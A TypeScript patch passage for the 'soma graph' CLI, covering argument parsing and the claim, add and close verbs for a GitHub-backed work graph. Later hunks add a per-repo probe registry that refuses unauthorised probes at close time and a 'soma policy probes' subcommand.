+  };
+}
+
+export type ParsedGraphArgs =
+  | ParsedGraphFrontierArgs
+  | ParsedGraphNodeArgs
+  | ParsedGraphClaimArgs
+  | ParsedGraphAddArgs
+  | ParsedGraphCloseArgs;
+
+// ---------------------------------------------------------------------------
+// Parsing
+// ---------------------------------------------------------------------------
+
+function isGraphAction(value: string | undefined): value is GraphAction {
+  return value !== undefined && (GRAPH_ACTIONS as readonly string[]).includes(value);
+}
+
+function readShared(options: GraphSharedOptions, args: string[], index: number, arg: string): number | undefined {
+  switch (arg) {
+    case "--repo":
+      options.repo = readOption(args, index, arg);
+      return index + 1;
+    case "--json":
+      options.json = true;
+      return index;
+    default:
+      return undefined;
+  }
+}
+
+function readPositiveInteger(args: string[], index: number, arg: string): number {
+  const raw = readOption(args, index, arg);
+  if (!/^[1-9]\d*$/.test(raw)) {
+    throw new Error(`${arg} must be a positive integer.`);
+  }
+  return Number(raw);
+}
+
+function parseJsonOption(raw: string, arg: string): unknown {
+  try {
+    return JSON.parse(raw) as unknown;
+  } catch {
+    throw new Error(`${arg} must be valid JSON.`);
+  }
+}
+
+function parseEvidenceOption(raw: string): CloseEvidence {
+  const value = parseJsonOption(raw, "--evidence");
+  if (typeof value !== "object" || value === null || Array.isArray(value)) {
+    throw new Error(`--evidence must be a JSON object: {"kind":"tested","summary":"…","pointer":"…"}`);
+  }
+  const record = value as Record<string, unknown>;
+  const kind = record.kind;
+  if (typeof kind !== "string" || !(EVIDENCE_KINDS as readonly string[]).includes(kind)) {
+    throw new Error(`--evidence "kind" must be one of: ${EVIDENCE_KINDS.join(", ")}.`);
+  }
+  const summary = record.summary;
+  if (typeof summary !== "string" || summary.trim().length === 0) {
+    throw new Error(`--evidence "summary" must be a non-empty string.`);
+  }
+  const pointer = record.pointer;
+  if (pointer !== undefined && typeof pointer !== "string") {
+    throw new Error(`--evidence "pointer" must be a string when present.`);
+  }
+  return {
+    kind: kind as WorkGraphEvidenceKind,
+    summary,
+    ...(pointer === undefined ? {} : { pointer }),
+  };
+}
+
+function requireTarget(action: GraphAction, target: string | undefined): string {
+  if (target === undefined || target.startsWith("--") || target.trim().length === 0) {
+    throw new Error(GRAPH_COMMAND_HELP.subcommands[action]);
+  }
+  return target.trim();
+}
+
+function parseAddArgs(target: string, rest: string[]): ParsedGraphAddArgs {
+  const options: ParsedGraphAddArgs["options"] = { spec: {}, blockedBy: [] };
+  const probes: unknown[] = [];
+  const budget: Record<string, number> = {};
+
+  for (let index = 0; index < rest.length; index += 1) {
+    const arg = rest[index];
+    const shared = readShared(options, rest, index, arg);
+    if (shared !== undefined) {
+      index = shared;
+      continue;
+    }
+
+    switch (arg) {
+      case "--title":
+        options.spec.title = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--autonomy":
+        options.spec.autonomy = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--kind":
+        options.spec.kind = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--body":
+        options.spec.body = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--body-file":
+        options.spec.bodyFile = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--checkpoint":
+        options.spec.checkpointId = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--probe":
+        probes.push(parseJsonOption(readOption(rest, index, arg), arg));
+        index += 1;
+        break;
+      case "--blocked-by":
+        options.blockedBy.push(readOption(rest, index, arg));
+        index += 1;
+        break;
+      case "--budget-tokens":
+        budget.tokens = readPositiveInteger(rest, index, arg);
+        index += 1;
+        break;
+      case "--budget-invocations":
+        budget.agentInvocations = readPositiveInteger(rest, index, arg);
+        index += 1;
+        break;
+      case "--budget-minutes":
+        budget.wallClockMin = readPositiveInteger(rest, index, arg);
+        index += 1;
+        break;
+      default:
+        throw new Error(`Unknown option: ${arg}`);
+    }
+  }
+
+  if (probes.length > 0) options.spec.probes = probes;
+  if (Object.keys(budget).length > 0) options.spec.budget = budget;
+  if (options.spec.title === undefined) {
+    throw new Error("soma graph add is missing required option: --title.");
+  }
+  if (options.spec.autonomy === undefined) {
+    throw new Error("soma graph add is missing required option: --autonomy.");
+  }
+
+  return { command: "graph", action: "add", target, options };
+}
+
+function parseCloseArgs(target: string, rest: string[]): ParsedGraphCloseArgs {
+  const options: ParsedGraphCloseArgs["options"] = { evidence: [] };
+
+  for (let index = 0; index < rest.length; index += 1) {
+    const arg = rest[index];
+    const shared = readShared(options, rest, index, arg);
+    if (shared !== undefined) {
+      index = shared;
+      continue;
+    }
+
+    switch (arg) {
+      case "--propose":
+        options.propose = true;
+        break;
+      case "--body":
+        options.body = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--body-file":
+        options.bodyFile = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--proposal-comment":
+        options.proposalComment = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--checkpoint":
+        options.checkpointId = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--identity":
+        options.identity = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--evidence":
+        options.evidence.push(parseEvidenceOption(readOption(rest, index, arg)));
+        index += 1;
+        break;
+      case "--dry-run":
+        options.dryRun = true;
+        break;
+      default:
+        throw new Error(`Unknown option: ${arg}`);
+    }
+  }
+
+  if (options.propose === true && options.body === undefined && options.bodyFile === undefined) {
+    throw new Error("soma graph close --propose needs --body or --body-file.");
+  }
+
+  return { command: "graph", action: "close", target, options };
+}
+
+export function parseGraphArgs(args: string[]): ParsedGraphArgs {
+  const [command, action, target, ...rest] = args;
+
+  if (command !== "graph" || !isGraphAction(action)) {
+    throw new Error(GRAPH_COMMAND_HELP.usage);
+  }
+
+  const resolvedTarget = requireTarget(action, target);
+
+  if (action === "add") return parseAddArgs(resolvedTarget, rest);
+  if (action === "close") return parseCloseArgs(resolvedTarget, rest);
+
+  const options: GraphSharedOptions & { identity?: string } = {};
+  for (let index = 0; index < rest.length; index += 1) {
+    const arg = rest[index];
+    const shared = readShared(options, rest, index, arg);
+    if (shared !== undefined) {
+      index = shared;
+      continue;
+    }
+    if (arg === "--identity" && action === "claim") {
+      options.identity = readOption(rest, index, arg);
+      index += 1;
+      continue;
+    }
+    throw new Error(`Unknown option: ${arg}`);
+  }
+
+  if (action === "claim") return { command, action, target: resolvedTarget, options };
+  return { command, action, target: resolvedTarget, options };
+}
+
+// ---------------------------------------------------------------------------
+// Dependencies
+// ---------------------------------------------------------------------------
+
+export interface GraphCliDeps {
+  createStore: (repo: string) => GraphStore;
+  resolveRepo: () => Promise<string>;
+  resolveIdentity: () => Promise<string>;
+  runProbes: (probes: readonly Probe[]) => Promise<ProbeResult[]>;
+  checkConfinement: () => Promise<ConfinementResult>;
+  /** An externally re-checkable anchor for probe evidence — the commit the probes ran against. */
+  evidencePointer: () => Promise<string | undefined>;
+  readTextFile: (path: string) => Promise<string>;
+  now: () => Date;
+  warn: (message: string) => void;
+  /** True when the running CLI is the dev tree rather than the installed binary (§1 clause 5). */
+  fromDevTree: boolean;
+}
+
+async function gh(args: string[]): Promise<string> {
+  const outcome = await runCommand({ argv: ["gh", ...args], timeoutSec: 60 });
+  if (outcome.exitCode !== 0) {
+    throw new SomaCliError(`gh ${args.join(" ")} failed (exit ${outcome.exitCode}): ${outcome.stderr.trim()}`, 1);
+  }
+  return outcome.stdout.trim();
+}
+
+/** `owner/name` out of any of the URL shapes a GitHub remote takes. */
+export function parseRepoFromRemote(remote: string): string | undefined {
+  const match = /github\.com[/:]([^/\s]+)\/([^/\s]+?)(?:\.git)?$/u.exec(remote.trim());
+  if (match === null) return undefined;
+  return `${match[1]}/${match[2]}`;
+}
+
+async function defaultResolveRepo(): Promise<string> {
+  const configured = process.env.SOMA_GRAPH_REPO;
+  if (configured !== undefined && configured.trim().length > 0) return configured.trim();
+
+  const remote = await runCommand({ argv: ["git", "remote", "get-url", "origin"], timeoutSec: 30 });
+  if (remote.exitCode === 0) {
+    const parsed = parseRepoFromRemote(remote.stdout);
+    if (parsed !== undefined) return parsed;
+  }
+
+  throw new SomaCliError(
+    "Cannot tell which repository backs this graph. Pass --repo <owner/name> or set SOMA_GRAPH_REPO.",
+    1,
+  );
+}
+
+async function defaultEvidencePointer(): Promise<string | undefined> {
+  const head = await runCommand({ argv: ["git", "rev-parse", "HEAD"], timeoutSec: 30 });
+  if (head.exitCode !== 0) return undefined;
+  const sha = head.stdout.trim();
+  return sha.length === 0 ? undefined : `HEAD ${sha}`;
+}
+
+function defaultDeps(): GraphCliDeps {
+  return {
+    createStore: (repo) => createGitHubGraphStore({ repo }),
+    resolveRepo: defaultResolveRepo,
+    resolveIdentity: async () => await gh(["api", "user", "--jq", ".login"]),
+    runProbes: async (probes) => await defaultRunProbes(probes),
+    checkConfinement: async () =>
+      await defaultCheckConfinement({
+        runCommand,
+        env: process.env,
+        platform: process.platform,
+        now: () => new Date(),
+      }),
+    evidencePointer: defaultEvidencePointer,
+    readTextFile: async (path) => await Bun.file(path).text(),
+    now: () => new Date(),
+    warn: (message) => process.stderr.write(`${message}\n`),
+    // The dev tree ships `src/`; an installed soma does not run from one.
+    fromDevTree: import.meta.url.includes("/src/cli/"),
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Rendering
+// ---------------------------------------------------------------------------
+
+function describeProbes(probes: readonly Probe[] | undefined): string[] {
+  if (probes === undefined || probes.length === 0) return ["probes: none declared"];
+  return ["probes:", ...probes.map((probe) => `  - ${JSON.stringify(probe)}`)];
+}
+
+function renderNodeState(state: NodeState): string {
+  const node = state.node;
+  return [
+    `node: ${state.ref.id}`,
+    `title: ${node.title}`,
+    `status: ${state.status}`,
+    `autonomy: ${node.autonomy}`,
+    `kind: ${node.kind ?? "—"}`,
+    `checkpoint: ${node.checkpointId ?? "—"}`,
+    `author: ${state.author.length > 0 ? state.author : "—"}`,
+    `assignees: ${state.assignees.length > 0 ? state.assignees.join(", ") : "—"}`,
+    `parent: ${state.parent?.id ?? "—"}`,
+    `blocked by: ${
+      state.blockedBy.length > 0
+        ? state.blockedBy.map((blocker) => `${blocker.id} (${blocker.status})`).join(", ")
+        : "—"
+    }`,
+    `typed: ${state.typed}${state.typed ? "" : " (no readable node block — reported fail-safe as approve with no probes)"}`,
+    ...(state.parseError === undefined ? [] : [`parse error: ${state.parseError}`]),
+    ...describeProbes(node.probes),
+    ...(state.url === undefined ? [] : [`url: ${state.url}`]),
+  ].join("\n");
+}
+
+function nodeSummary(state: NodeState): string {
+  const node = state.node;
+  const tags = [node.autonomy, node.kind ?? "no kind", state.typed ? "typed" : "untyped"].join(", ");
+  return `- ${state.ref.id} ${node.title} [${tags}]`;
+}
+
+// ---------------------------------------------------------------------------
+// Verbs
+// ---------------------------------------------------------------------------
+
+async function runFrontier(parsed: ParsedGraphFrontierArgs, graph: WorkGraph, repo: string): Promise<string> {
+  const confirmed = await graph.frontier({ id: parsed.target });
+
+  if (parsed.options.json === true) {
+    return JSON.stringify({ repo, root: parsed.target, frontier: confirmed }, null, 2);
+  }
+
+  return [
+    `Work graph frontier — root ${parsed.target} (${repo})`,
+    "",
+    ...(confirmed.length > 0 ? confirmed.map((state) => nodeSummary(state)) : ["- none"]),
+    "",
+    `${confirmed.length} node(s) open, unassigned, and unblocked.`,
+    "Advisory (§2.4): the frontier can read short when membership edges are missing or the tracker index lags.",
+  ].join("\n");
+}
+
+async function runNode(parsed: ParsedGraphNodeArgs, graph: WorkGraph, repo: string): Promise<string> {
+  const state = await graph.readNode({ id: parsed.target });
+  if (parsed.options.json === true) {
+    return JSON.stringify({ repo, ...state }, null, 2);
+  }
+  return [`Work graph node ${parsed.target} (${repo})`, "", renderNodeState(state)].join("\n");
+}
+
+async function runClaim(
+  parsed: ParsedGraphClaimArgs,
+  graph: WorkGraph,
+  repo: string,
+  deps: GraphCliDeps,
+): Promise<string> {
+  const identity = parsed.options.identity ?? (await deps.resolveIdentity());
+  const result = await graph.claim({ id: parsed.target }, identity);
+
+  if (parsed.options.json === true) {
+    const rendered = JSON.stringify({ repo, node: parsed.target, ...result }, null, 2);
+    if (!result.held) throw new SomaCliError(rendered, 1);
+    return rendered;
+  }
+
+  if (!result.held) {
+    throw new SomaCliError(
+      [
+        `Node ${parsed.target} is held by ${result.holder ?? "another session"} — code-point tie-break (§2.4).`,
+        `${identity} withdrew its assignment; assignees now: ${result.assignees.join(", ") || "—"}`,
+      ].join("\n"),
+      1,
+    );
+  }
+
+  return [
+    `Claimed node ${parsed.target} as ${identity} (${repo}).`,
+    `assignees: ${result.assignees.join(", ")}`,
+  ].join("\n");
+}
+
+async function resolveBody(
+  deps: GraphCliDeps,
+  body: string | undefined,
+  bodyFile: string | undefined,
+): Promise<string | undefined> {
+  if (bodyFile !== undefined) return await deps.readTextFile(bodyFile);
+  return body;
+}
+
+async function runAdd(
+  parsed: ParsedGraphAddArgs,
+  graph: WorkGraph,
+  repo: string,
+  deps: GraphCliDeps,
+): Promise<string> {
+  const { bodyFile, ...rest } = parsed.options.spec;
+  const body = await resolveBody(deps, typeof rest.body === "string" ? rest.body : undefined, typeof bodyFile === "string" ? bodyFile : undefined);
+
+  const created = await graph.createNode({
+    ...rest,
+    ...(body === undefined ? {} : { body }),
+    parent: { id: parsed.target },
+  });
+
+  // The node exists from here on. An edge that fails leaves it created but
+  // under-blocked, so the failure has to name what did land — silently
+  // surfacing a node on the frontier that should have been blocked is worse
+  // than an error that says so.
+  const edges: string[] = [];
+  for (const blockerId of parsed.options.blockedBy) {
+    try {
+      await graph.addBlockingEdge({ id: blockerId }, created);
+    } catch (error) {
+      throw new SomaCliError(
+        [
+          `Created node ${created.id} under ${parsed.target}, then failed to add "blocked by ${blockerId}":`,
+          error instanceof Error ? error.message : String(error),
+          edges.length > 0 ? `Edges already written: ${edges.join("; ")}` : "No blocking edges were written.",
+          `Node ${created.id} is on the frontier until its remaining blockers are wired.`,
+        ].join("\n"),
+        1,
+      );
+    }
+    edges.push(`${created.id} blocked by ${blockerId}`);
+  }
+
+  if (parsed.options.json === true) {
+    return JSON.stringify({ repo, node: created.id, parent: parsed.target, blockedBy: parsed.options.blockedBy }, null, 2);
+  }
+
+  return [
+    `Created node ${created.id} under ${parsed.target} (${repo}).`,
+    ...(edges.length > 0 ? ["", "Blocking edges:", ...edges.map((edge) => `- ${edge}`)] : []),
+  ].join("\n");
+}
+
+/**
+ * Pick the ratifying reaction (§3.2). A 👎 from the graph root's author is an
+ * explicit refusal, so no ratification is taken from that comment at all —
+ * otherwise a third party's 👍 could carry a close over the one person whose
+ * approval conjunct 4 actually asks for.
+ */
+export function selectRatification(
+  reactions: readonly Reaction[],
+  proposalAuthor: string,
+  rootAuthor: string | undefined,
+): { kind: "reaction"; id: string; author: string } | undefined {
+  if (
+    rootAuthor !== undefined &&
+    reactions.some((reaction) => reaction.content === "-1" && reaction.author === rootAuthor)
+  ) {
+    return undefined;
+  }
+
+  const approvals = reactions
+    .filter((reaction) => reaction.content === "+1" && reaction.author !== proposalAuthor)
+    .sort((left, right) => (left.author < right.author ? -1 : left.author > right.author ? 1 : 0));
+
+  if (approvals.length === 0) return undefined;
+  const preferred = approvals.find((reaction) => reaction.author === rootAuthor) ?? approvals[0];
+  return { kind: "reaction", id: preferred.id, author: preferred.author };
+}
+
+async function runClose(
+  parsed: ParsedGraphCloseArgs,
+  graph: WorkGraph,
+  store: GraphStore,
+  repo: string,
+  deps: GraphCliDeps,
+): Promise<string> {
+  const ref: NodeRef = { id: parsed.target };
+  const state = await graph.readNode(ref);
+
+  if (parsed.options.propose === true) {
+    const body = await resolveBody(deps, parsed.options.body, parsed.options.bodyFile);
+    if (body === undefined || body.trim().length === 0) {
+      throw new SomaCliError("soma graph close --propose needs a non-empty --body or --body-file.", 1);
+    }
+    const comment = await graph.postComment(ref, body);
+    return [
+      `Posted proposal comment ${comment.id} on node ${ref.id} (${repo}).`,
+      comment.url === undefined ? undefined : `url: ${comment.url}`,
+      "",
+      "The receipt is a 👍 on THIS comment from the graph root's author (§3.2). Once it is there:",
+      `  soma graph close ${ref.id} --proposal-comment ${comment.id}`,
+    ]
+      .filter((line) => line !== undefined)
+      .join("\n");
+  }
+
+  if (deps.fromDevTree) {
+    deps.warn(
+      "Warning: `soma graph close` is running from the dev tree. §1 clause 5 puts enforcement in the installed binary — a close gated by the tree it guards is not gated.",
+    );
+  }
+
+  const identity = parsed.options.identity ?? (await deps.resolveIdentity());
+  const probes = state.node.probes ?? [];
+  const probeResults = await deps.runProbes(probes);
+
+  const evidence: CloseEvidence[] = [...parsed.options.evidence];
+  if (probes.length > 0 && allProbesPassed(probeResults)) {
+    const pointer = await deps.evidencePointer();
+    if (pointer !== undefined) {
+      evidence.push({
+        kind: "probed",
+        summary: `${probeResults.length}/${probeResults.length} declared probes ran and passed`,
+        pointer,
+      });
+    }
+  }
+
+  const root = await findGraphRoot(ref, async (nodeRef) => await graph.readNode(nodeRef));
+
+  let proposal: { commentId: string; author: string } | undefined;
+  let ratification: { kind: "reaction" | "comment"; id: string; author: string } | undefined;
+
+  if (state.node.autonomy !== "auto") {
+    const commentId = parsed.options.proposalComment;
+    if (commentId === undefined) {
+      throw new SomaCliError(
+        [
+          `Node ${ref.id} is ${state.node.autonomy}-class: it closes on a ratified proposal, not on a self-report (§3.2).`,
+          `Post one with:  soma graph close ${ref.id} --propose --body-file <path>`,
+          `Then close with: soma graph close ${ref.id} --proposal-comment <id>`,
+        ].join("\n"),
+        1,
+      );
+    }
+    const proposalRef: CommentRef = await graph.readComment({ id: commentId, nodeId: ref.id });
+    proposal = { commentId: proposalRef.id, author: proposalRef.author ?? "" };
+    const reactions = await graph.readCommentReactions(proposalRef);
+    ratification = selectRatification(reactions, proposal.author, root?.author);
+    if (ratification !== undefined) {
+      evidence.push({
+        kind: "approved",
+        summary: `ratified by ${ratification.author} via ${ratification.kind} on proposal comment ${proposal.commentId}`,
+        pointer: proposalRef.url ?? `comment:${proposal.commentId}`,
+      });
+    }
+  }
+
+  const confinement = await deps.checkConfinement();
+  const { attestation, facts } = deriveAttestation({
+    backendCapability: store.attestation,
+    actingIdentity: identity,
+    confinement,
+    ...(proposal === undefined ? {} : { proposal }),
+    ...(ratification === undefined ? {} : { ratification }),
+    ...(root === undefined ? {} : { root }),
+  });
+
+  const receipt: CloseReceipt = {
+    checkpointId: parsed.options.checkpointId ?? state.node.checkpointId ?? "",
+    closedBy: identity,
+    at: deps.now().toISOString(),
+    evidence,
+    probeResults,
+    attestation,
+    attestationFacts: facts,
+  };
+
+  if (parsed.options.dryRun === true) {
+    let verdict = "would be ACCEPTED";
+    try {
+      assertClosable(state.node, receipt);
+    } catch (error) {
+      verdict = `would be REFUSED — ${error instanceof WorkGraphError ? error.message : String(error)}`;
+    }
+    return [
+      `Dry run for node ${ref.id} (${repo}) — nothing written.`,
+      `close ${verdict}`,
+      "",
+      renderCloseReceipt(receipt),
+    ].join("\n");
+  }
+
+  await graph.close(ref, receipt);
+
+  return [
+    `Closed node ${ref.id} (${repo}) — attestation: ${attestation}.`,
+    ...(attestation === "unverified" && facts.reasons !== undefined
+      ? ["", "Unverified because:", ...facts.reasons.map((reason) => `- ${reason}`)]
+      : []),
+    "",
+    "Receipt posted to the tracker.",
+  ].join("\n");
+}
+
+export async function runGraphCli(parsed: ParsedGraphArgs, overrides: Partial<GraphCliDeps> = {}): Promise<string> {
+  const deps: GraphCliDeps = { ...defaultDeps(), ...overrides };
+  const repo = parsed.options.repo ?? (await deps.resolveRepo());
+  const store = deps.createStore(repo);
+  const graph = new WorkGraph(store);
+
+  switch (parsed.action) {
+    case "frontier":
+      return await runFrontier(parsed, graph, repo);
+    case "node":
+      return await runNode(parsed, graph, repo);
+    case "claim":
+      return await runClaim(parsed, graph, repo, deps);
+    case "add":
+      return await runAdd(parsed, graph, repo, deps);
+    case "close":
+      return await runClose(parsed, graph, store, repo, deps);
+  }
+}

--- a/src/cli/graph.ts
+++ b/src/cli/graph.ts
@@ -397,7 +397,17 @@ export interface GraphCliDeps {
   loadProbeRegistry: (repo: string) => Promise<ProbeRegistry>;
   runProbes: (probes: readonly Probe[], registry: ProbeRegistry) => Promise<ProbeResult[]>;
   checkConfinement: () => Promise<ConfinementResult>;
-  /** An externally re-checkable anchor for probe evidence — the commit the probes ran against. */
+  /**
+   * An anchor for probe evidence — the commit the probes ran against.
+   *
+   * "Externally checkable" is the bar `assertClosable` states, and this clears it
+   * only partly: the default reads `git rev-parse HEAD` in the CLI's own cwd, so
+   * it names a commit that may be unpushed, and that is the *runner's* tree
+   * rather than any tree a probe chose via `repo`. A reader can re-derive what it
+   * points at; they cannot always fetch it. Recorded rather than papered over —
+   * making it strictly external (refuse an unpushed sha) is a change to what
+   * closes an `auto` node, which is a decision, not a default.
+   */
   evidencePointer: () => Promise<string | undefined>;
   readTextFile: (path: string) => Promise<string>;
   now: () => Date;

--- a/src/cli/graph.ts
+++ b/src/cli/graph.ts
@@ -50,6 +50,11 @@ import {
   type ConfinementResult,
 } from "../work-graph-attestation";
 import { createGitHubGraphStore } from "../work-graph-github";
+import {
+  isProbeRefusal,
+  loadProbeRegistry as defaultLoadProbeRegistry,
+  type ProbeRegistry,
+} from "../work-graph-probe-registry";
 import { allProbesPassed, runCommand, runProbes as defaultRunProbes } from "../work-graph-probes";
 import { SomaCliError } from "./errors";
 import { readOption } from "./parse-utils";
@@ -67,7 +72,7 @@ export const GRAPH_COMMAND_HELP: { usage: string; subcommands: Record<GraphActio
     claim: "Usage: soma graph claim <id> [--identity <login>] [--repo <owner/name>] [--json]",
     add: "Usage: soma graph add <root> --title <text> --autonomy <auto|propose|approve> [--kind <k>] [--body <text>|--body-file <path>] [--checkpoint <id>] [--probe <json>]... [--blocked-by <id>]... [--budget-tokens <n>] [--budget-invocations <n>] [--budget-minutes <n>] [--repo <owner/name>] [--json]",
     close:
-      "Usage: soma graph close <id> [--propose --body <text>|--body-file <path>] [--proposal-comment <id>] [--checkpoint <id>] [--evidence <json>]... [--identity <login>] [--dry-run] [--repo <owner/name>]",
+      "Usage: soma graph close <id> [--propose --body <text>|--body-file <path>] [--proposal-comment <id>] [--checkpoint <id>] [--evidence <json>]... [--identity <login>] [--dry-run] [--repo <owner/name>] [--soma-home <dir>]",
   },
 };
 
@@ -121,6 +126,8 @@ export interface ParsedGraphCloseArgs {
     identity?: string;
     dryRun?: boolean;
     evidence: CloseEvidence[];
+    /** Where the probe registry lives when it is not `~/.soma` (§2.2). */
+    somaHome?: string;
   };
 }
 
@@ -310,6 +317,10 @@ function parseCloseArgs(target: string, rest: string[]): ParsedGraphCloseArgs {
         options.identity = readOption(rest, index, arg);
         index += 1;
         break;
+      case "--soma-home":
+        options.somaHome = readOption(rest, index, arg);
+        index += 1;
+        break;
       case "--evidence":
         options.evidence.push(parseEvidenceOption(readOption(rest, index, arg)));
         index += 1;
@@ -369,7 +380,13 @@ export interface GraphCliDeps {
   createStore: (repo: string) => GraphStore;
   resolveRepo: () => Promise<string>;
   resolveIdentity: () => Promise<string>;
-  runProbes: (probes: readonly Probe[]) => Promise<ProbeResult[]>;
+  /**
+   * The registry is loaded per close and handed to the runner rather than read
+   * inside it: one place decides which repo's declarations apply, and the
+   * refusal messages can name the document the adopter has to edit.
+   */
+  loadProbeRegistry: (repo: string, somaHome: string | undefined) => Promise<ProbeRegistry>;
+  runProbes: (probes: readonly Probe[], registry: ProbeRegistry) => Promise<ProbeResult[]>;
   checkConfinement: () => Promise<ConfinementResult>;
   /** An externally re-checkable anchor for probe evidence — the commit the probes ran against. */
   evidencePointer: () => Promise<string | undefined>;
@@ -395,7 +412,13 @@ export function parseRepoFromRemote(remote: string): string | undefined {
   return `${match[1]}/${match[2]}`;
 }
 
-async function defaultResolveRepo(): Promise<string> {
+/**
+ * Which repository backs this graph. Exported because the probe registry is
+ * scoped by repo identity, so `soma policy probes` has to resolve it the same
+ * way `soma graph` does — two answers to "which repo" would mean an adopter
+ * declaring commands under a key the close path never looks at.
+ */
+export async function resolveGraphRepo(): Promise<string> {
   const configured = process.env.SOMA_GRAPH_REPO;
   if (configured !== undefined && configured.trim().length > 0) return configured.trim();
 
@@ -421,9 +444,11 @@ async function defaultEvidencePointer(): Promise<string | undefined> {
 function defaultDeps(): GraphCliDeps {
   return {
     createStore: (repo) => createGitHubGraphStore({ repo }),
-    resolveRepo: defaultResolveRepo,
+    resolveRepo: resolveGraphRepo,
     resolveIdentity: async () => await gh(["api", "user", "--jq", ".login"]),
-    runProbes: async (probes) => await defaultRunProbes(probes),
+    loadProbeRegistry: async (repo, somaHome) =>
+      await defaultLoadProbeRegistry({ repo, ...(somaHome === undefined ? {} : { somaHome }) }),
+    runProbes: async (probes, registry) => await defaultRunProbes(probes, { registry }),
     checkConfinement: async () =>
       await defaultCheckConfinement({
         runCommand,
@@ -657,7 +682,26 @@ async function runClose(
 
   const identity = parsed.options.identity ?? (await deps.resolveIdentity());
   const probes = state.node.probes ?? [];
-  const probeResults = await deps.runProbes(probes);
+  const registry = await deps.loadProbeRegistry(repo, parsed.options.somaHome);
+  const probeResults = await deps.runProbes(probes, registry);
+  const refusals = probeResults.filter((result) => isProbeRefusal(result));
+
+  // A refused probe reaches `assertClosable` as "ran and failed", which is true
+  // but useless to act on. Surface it here instead, where the reason — and the
+  // exact entry to declare — is still in hand. A dry run keeps going: showing
+  // the whole receipt is the point of asking for one.
+  if (refusals.length > 0 && parsed.options.dryRun !== true) {
+    throw new SomaCliError(
+      [
+        `Close refused: ${refusals.length} of ${probeResults.length} declared probe(s) are not authorised on this machine.`,
+        "",
+        ...refusals.map((refusal) => (refusal.state === "probed" ? refusal.observed : "")),
+        "",
+        "Nothing was written. The registry is yours to edit — soma has no verb that widens it (§4: loosening is identity-bound).",
+      ].join("\n"),
+      1,
+    );
+  }
 
   const evidence: CloseEvidence[] = [...parsed.options.evidence];
   if (probes.length > 0 && allProbesPassed(probeResults)) {
@@ -731,6 +775,9 @@ async function runClose(
     return [
       `Dry run for node ${ref.id} (${repo}) — nothing written.`,
       `close ${verdict}`,
+      ...(refusals.length > 0
+        ? ["", `Probe registry: ${refusals.length} of ${probeResults.length} probe(s) refused (${registry.path}).`]
+        : []),
       "",
       renderCloseReceipt(receipt),
     ].join("\n");

--- a/src/cli/policy.ts
+++ b/src/cli/policy.ts
@@ -10,6 +10,8 @@ import type {
   SomaPolicyCheckOptions,
   SomaPolicyCheckResult,
 } from "../types";
+import { loadProbeRegistry, type ProbeRegistry } from "../work-graph-probe-registry";
+import { resolveGraphRepo } from "./graph";
 import { readOption } from "./parse-utils";
 import { parseSubstrate } from "./substrate";
 
@@ -49,7 +51,20 @@ export interface ParsedPolicyGuardArgs {
   json: boolean;
 }
 
-export type ParsedPolicyArgs = ParsedPolicyCheckArgs | ParsedPolicyScanArgs | ParsedPolicyPromoteArgs | ParsedPolicyInspectArgs | ParsedPolicyGuardArgs;
+export interface ParsedPolicyProbesArgs {
+  command: "policy";
+  action: "probes";
+  options: { repo?: string; homeDir?: string; somaHome?: string };
+  json: boolean;
+}
+
+export type ParsedPolicyArgs =
+  | ParsedPolicyCheckArgs
+  | ParsedPolicyScanArgs
+  | ParsedPolicyPromoteArgs
+  | ParsedPolicyInspectArgs
+  | ParsedPolicyGuardArgs
+  | ParsedPolicyProbesArgs;
 
 const POLICY_CHECK_USAGE =
   "Usage: soma policy check --action write --destination <path> [--content <text>|--content-env <name>] [--source <path>] [--substrate <id>] [--record <all|deny|none>] [--json]";
@@ -61,15 +76,18 @@ const POLICY_INSPECT_USAGE =
   "Usage: soma policy inspect --surface <prompt|tool_call|permission_request|config_change|governance_event> [--prompt <text>|--prompt-env <name>] [--tool-name <name> --tool-input-env <name>] [--permission-request-env <name>] [--config-change-env <name>] [--substrate <id>] [--record <all|deny|none>] [--json]";
 const POLICY_GUARD_USAGE =
   "Usage: soma policy guard --substrate <id> --tool-name <name> --tool-input-env <name> [--cwd <dir>] [--soma-home <dir>] [--home-dir <dir>] [--private-root <dir>]… [--record <all|deny|none>] [--json]";
+const POLICY_PROBES_USAGE =
+  "Usage: soma policy probes [--repo <owner/name>] [--soma-home <dir>] [--home-dir <dir>] [--json]";
 
 export const POLICY_COMMAND_HELP: { usage: string; subcommands: Record<ParsedPolicyArgs["action"], string> } = {
-  usage: [POLICY_CHECK_USAGE, POLICY_SCAN_USAGE, POLICY_PROMOTE_USAGE, POLICY_INSPECT_USAGE, POLICY_GUARD_USAGE].join("\n"),
+  usage: [POLICY_CHECK_USAGE, POLICY_SCAN_USAGE, POLICY_PROMOTE_USAGE, POLICY_INSPECT_USAGE, POLICY_GUARD_USAGE, POLICY_PROBES_USAGE].join("\n"),
   subcommands: {
     check: POLICY_CHECK_USAGE,
     scan: POLICY_SCAN_USAGE,
     promote: POLICY_PROMOTE_USAGE,
     inspect: POLICY_INSPECT_USAGE,
     guard: POLICY_GUARD_USAGE,
+    probes: POLICY_PROBES_USAGE,
   },
 };
 
@@ -84,6 +102,7 @@ export function parsePolicyArgs(args: string[]): ParsedPolicyArgs {
   if (action === "promote") return parsePolicyPromoteArgs(command, action, rest);
   if (action === "inspect") return parsePolicyInspectArgs(command, action, rest);
   if (action === "guard") return parsePolicyGuardArgs(command, action, rest);
+  if (action === "probes") return parsePolicyProbesArgs(command, action, rest);
   if (action !== "check") throw new Error(POLICY_COMMAND_HELP.usage);
 
   const options: Partial<SomaPolicyCheckOptions> = {};
@@ -264,7 +283,47 @@ function parsePolicyGuardArgs(command: "policy", action: "guard", rest: string[]
   return { command, action, options: options as ToolCallPolicyGuardOptions, json };
 }
 
+function parsePolicyProbesArgs(command: "policy", action: "probes", rest: string[]): ParsedPolicyProbesArgs {
+  const options: ParsedPolicyProbesArgs["options"] = {};
+  let json = false;
+
